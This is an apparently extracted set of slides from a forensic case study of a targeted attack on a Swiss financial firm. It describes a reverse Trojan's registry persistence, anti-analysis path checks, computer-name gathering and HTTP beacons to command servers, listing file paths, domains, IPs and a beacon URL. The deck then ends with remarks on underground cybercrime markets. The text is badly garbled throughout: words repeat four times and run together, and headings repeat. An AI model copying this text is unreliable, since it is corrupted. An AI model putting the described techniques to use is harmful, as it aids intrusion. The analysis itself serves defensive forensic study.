inininin severalseveralseveralseveral systemsystemsystemsystem applications’applications’applications’applications’ addressaddressaddressaddress

spacespacespacespace, and therefore permits attackers to

injectinjectinjectinject theirtheirtheirtheir maliciousmaliciousmaliciousmalicious codecodecodecode intointointointo privilegedprivilegedprivilegedprivileged

programsprogramsprogramsprograms.





� Trojan then modifies a few registry keys and

becomebecomebecomebecome persistentpersistentpersistentpersistent.





� The ReverseReverseReverseReverse----TrojanTrojanTrojanTrojan alsoalsoalsoalso verifiesverifiesverifiesverifies thethethethe pathpathpathpath

fromfromfromfrom whichwhichwhichwhich itititit waswaswaswas runrunrunrun, and it checks that

file “C:\Documents.exe”, “C:\Documents and

Settings\user\Desktop.exe” or “C:\Documents

and Settings\user\Desktop\update2.exe” does

exist in order to authorize or deny its own

execution.

� It also check for the registry key

“HKEY_CLASSES_ROOT\AppID\update2.exe”.

� These are commoncommoncommoncommon practicespracticespracticespractices among malware

writers totototo helphelphelphelp disturbingdisturbingdisturbingdisturbing ReverseReverseReverseReverse

EngineersEngineersEngineersEngineers.





� Trojan then gets the compromised computercomputercomputercomputer

namenamenamename bybybyby queryingqueryingqueryingquerying LSALSALSALSA and listslistslistslists thethethethe CCCC::::\\\\ drivedrivedrivedrive

before doing a recursiverecursiverecursiverecursive searchsearchsearchsearch ofofofof livinglivinglivingliving

filesfilesfilesfiles withinwithinwithinwithin itsitsitsits parentparentparentparent directorydirectorydirectorydirectory.

� GettingGettingGettingGetting computercomputercomputercomputer andandandand useruseruseruser namesnamesnamesnames is also a

commoncommoncommoncommon practicepracticepracticepractice forforforfor TrojansTrojansTrojansTrojans, as they most

often need to declare unique zombies on

their C&C server to permit accurate

communication with Bot Herders.





� Trojan tried to send HTTPHTTPHTTPHTTP packetspacketspacketspackets totototo 2222

differentdifferentdifferentdifferent serversserversserversservers:

� After having redirectedredirectedredirectedredirected thosethosethosethose IPIPIPIP addressesaddressesaddressesaddresses

withwithwithwith ARPARPARPARP PoisoningPoisoningPoisoningPoisoning and simulatingsimulatingsimulatingsimulating anananan HTTPHTTPHTTPHTTP

serviceserviceserviceservice, we can see Trojan saying a kind of

“Hello,Hello,Hello,Hello, I’mI’mI’mI’m herehereherehere” to those web applications.





� The firstfirstfirstfirst serverserverserverserver was probably aimed to offer

an alternatealternatealternatealternate routerouterouteroute in case the second one

was taken down. It actuallyactuallyactuallyactually forwardedforwardedforwardedforwarded itsitsitsits

packetspacketspacketspackets to greenchina.com.





� Involved domainsdomainsdomainsdomains existexistexistexist sincesincesincesince quitequitequitequite aaaa longlonglonglong

timetimetimetime.

� serv.com and greenchina.com domains were

respectively registered in NovemberNovemberNovemberNovember 1994199419941994

and AprilAprilAprilApril 2001200120012001. The IP addresses which

received the suspicious GET requests,

211211211211....119119119119....134134134134....197197197197 and 218218218218....145145145145....65656565....200200200200,

respectively hosted 1111''''644644644644 andandandand 11111111 websiteswebsiteswebsiteswebsites.

� Despite its parameters, the URLURLURLURL

http://www.greenchina.com/?guid=UserName!COMPUTERNAME!

00CD1A40 diddiddiddid notnotnotnot looklooklooklook likelikelikelike sosososo aaaa dangerousdangerousdangerousdangerous...





� It visually reachedreachedreachedreached aaaa standardstandardstandardstandard webpagewebpagewebpagewebpage…

� But theretheretherethere werewerewerewere hiddenhiddenhiddenhidden informationinformationinformationinformation.




Table of contents

0x00 - About me






0x06 - Conclusion




0x06 - Conclusion

� Finally, the targettargettargettarget of this complex attackwaswaswaswas notnotnotnot directlydirectlydirectlydirectly ourourourour client,client,client,client, butbutbutbut hishishishis ownownownowncustomerscustomerscustomerscustomers.

� For sure, it has alsoalsoalsoalso impactedimpactedimpactedimpacted FedorFedorFedorFedor----TradingTradingTradingTrading.

� Once the website was compromised,everythingeverythingeverythingeverything happenedhappenedhappenedhappened reallyreallyreallyreally fastfastfastfast.

� AttacksAttacksAttacksAttacks werewerewerewere initiatedinitiatedinitiatedinitiated bybybyby anananan unfairunfairunfairunfaircompetitorcompetitorcompetitorcompetitor who afforded the services ofundergroundundergroundundergroundunderground marketmarketmarketmarket.

� Both financialfinancialfinancialfinancial companiescompaniescompaniescompanies are present inSwitzerlandSwitzerlandSwitzerlandSwitzerland andandandand abroadabroadabroadabroad.




0x06 - Conclusion

� So globally the attack implied:

�Malware Code Malware Code Malware Code Malware Code WritingWritingWritingWriting

(dropper, downloader, Banking Trojan)

�0000----day Uncoveringday Uncoveringday Uncoveringday Uncovering

(Adobe Reader stack buffer overflow)

� Social EngineeringSocial EngineeringSocial EngineeringSocial Engineering

(Forex Regulation)

� Web AttacksWeb AttacksWeb AttacksWeb Attacks

(Sh404Sef SQL Injection)

� And most probablyprobablyprobablyprobably moneymoneymoneymoney transfertransfertransfertransfer

� In fact, we are typically in a modernmodernmodernmodern scenarioscenarioscenarioscenario

ofofofof undergroundundergroundundergroundunderground skillsskillsskillsskills rentingrentingrentingrenting....




0x06 - Conclusion




0x06 - Conclusion

� This offers many business opportunities.




0x06 - Conclusion

� Organised cybercrimes exist in lots of

countries, and aaaa sophisticatedsophisticatedsophisticatedsophisticated undergroundundergroundundergroundunderground

economyeconomyeconomyeconomy hashashashas rapidlyrapidlyrapidlyrapidly flourishedflourishedflourishedflourished those last

years. But the hugehugehugehuge majoritymajoritymajoritymajority ofofofof attacksattacksattacksattacks

involvedinvolvedinvolvedinvolved China,China,China,China, RussiaRussiaRussiaRussia andandandand BrazilBrazilBrazilBrazil.




0x06 - Conclusion

� There is muchmuchmuchmuch lesslesslessless HackingHackingHackingHacking ForForForFor FunFunFunFun, andmuchmuchmuchmuch moremoremoremore HackingHackingHackingHacking ForForForFor ProfitProfitProfitProfit. CybercrimeCybercrimeCybercrimeCybercrimehashashashas thereforethereforethereforetherefore becomebecomebecomebecome anananan enterpriseenterpriseenterpriseenterprise with athriving underground economy.

� New cybercriminals don’t have to developtheir own code… They cancancancan rentrentrentrent botnetsbotnetsbotnetsbotnets andeven purchasepurchasepurchasepurchase licensedlicensedlicensedlicensed malwaremalwaremalwaremalware that comeswith its ownownownown techtechtechtech supportsupportsupportsupport.

� CybercrimeCybercrimeCybercrimeCybercrime isisisis nownownownow developingdevelopingdevelopingdeveloping andandandand spreadingspreadingspreadingspreadingfaster than ever.

� So welcome in the WorldWorldWorldWorld WildWildWildWild WebWebWebWeb… Andhappyhappyhappyhappy Forensics!Forensics!Forensics!Forensics! :)




\xC29900: RETN 99

Your questions are always welcome!

[email protected]

cybercrime in nowadays businesses - a real case study of targeted attack

Technology